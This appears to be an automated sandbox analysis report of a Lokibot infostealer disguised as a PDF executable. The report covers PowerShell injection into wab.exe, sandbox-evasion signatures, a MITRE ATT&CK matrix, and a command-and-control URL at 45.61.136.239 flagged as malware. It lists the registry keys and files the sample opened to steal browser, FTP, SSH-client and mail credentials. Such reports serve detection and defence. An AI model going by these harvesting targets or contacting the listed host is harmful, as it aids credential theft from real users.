              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 383D1AD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5726Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4051Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5093Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2936Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7708Thread sleep count: 5093 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7704Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 5093 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_00406404 FindFirstFileW,FindClose,0_2_00406404
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_004058B2 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004058B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 60000Jump to behavior
              Source: wab.exe, 0000000E.00000002.2447479281.00000000059F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
              Source: wab.exe, 0000000E.00000002.2447479281.0000000005998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@\
              Source: wab.exe, 0000000E.00000002.2447479281.00000000059F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-1283
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-1495
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_034AD150 LdrInitializeThunk,LdrInitializeThunk,2_2_034AD150
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E01AE4 LdrInitializeThunk,GetProcessHeap,HeapFree,14_2_00E01AE4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E032C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00E032C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E03450 SetUnhandledExceptionFilter,14_2_00E03450

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F40000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F0F894Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E03675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,14_2_00E03675
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_004060E3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004060E3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000E.00000002.2447479281.00000000059D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7572, type: MEMORYSTR
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000E.00000002.2447479281.00000000059D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7572, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Obfuscated Files or Information              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		1
              Software Packing              		1
              Credentials in Registry              		2
              File and Directory Discovery              		Remote Desktop Protocol2
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)111
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager116
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Masquerading              		NTDS221
              Security Software Discovery              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script41
              Virtualization/Sandbox Evasion              		LSA Secrets1
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Access Token Manipulation              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Process Injection              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466694 Sample: BPN__S-I03810366200624-8202... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 34 drive.usercontent.google.com 2->34 36 drive.google.com 2->36 46 Snort IDS alert for network traffic 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 5 other signatures 2->52 8 BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe 2 30 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\...\Spirochete204.Myc, ASCII 8->22 dropped 54 Suspicious powershell command line found 8->54 12 powershell.exe 20 8->12         started        signatures6 process7 file8 24 BPN__S-I0381036620...135021#U00b7pdf.exe, PE32 12->24 dropped 26 BPN__S-I0381036620...exe:Zone.Identifier, ASCII 12->26 dropped 56 Writes to foreign memory regions 12->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 12->58 60 Powershell drops PE file 12->60 16 wab.exe 75 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 45.61.136.239, 49708, 49709, 49710 AS40676US United States 16->28 30 drive.usercontent.google.com 142.250.185.193, 443, 49707 GOOGLEUS United States 16->30 32 drive.google.com 142.250.186.110, 443, 49706 GOOGLEUS United States 16->32 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->38 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal ftp login credentials 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe16%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe16%ReversingLabsWin32.Trojan.Generic

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://45.61.136.239/index.php/54596186971079qc0%Avira URL Cloudsafe
              https://drive.google.com/0%Avira URL Cloudsafe
              https://drive.usercontent.google.com/0%Avira URL Cloudsafe
              http://crl.micro0%Avira URL Cloudsafe
              http://45.61.136.239/index.php/54596186971079100%Avira URL Cloudmalware
              http://www.microsoft.coL0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		142.250.186.110
              		truefalse
                		unknown
                drive.usercontent.google.com
                		142.250.185.193
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://45.61.136.239/index.php/54596186971079true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.google.comwab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://45.61.136.239/index.php/54596186971079qcwab.exe, 0000000E.00000002.2447479281.0000000005A07000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.microsoft.coLpowershell.exe, 00000002.00000002.1610988819.0000000008A30000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.micropowershell.exe, 00000002.00000002.1608481030.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1602438501.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1602438501.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1602438501.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://drive.google.com/wab.exe, 0000000E.00000002.2447479281.0000000005998000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://drive.usercontent.google.com/wab.exe, 0000000E.00000002.2447479281.0000000005A07000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://apis.google.comwab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorErrorBPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1602438501.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1602438501.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
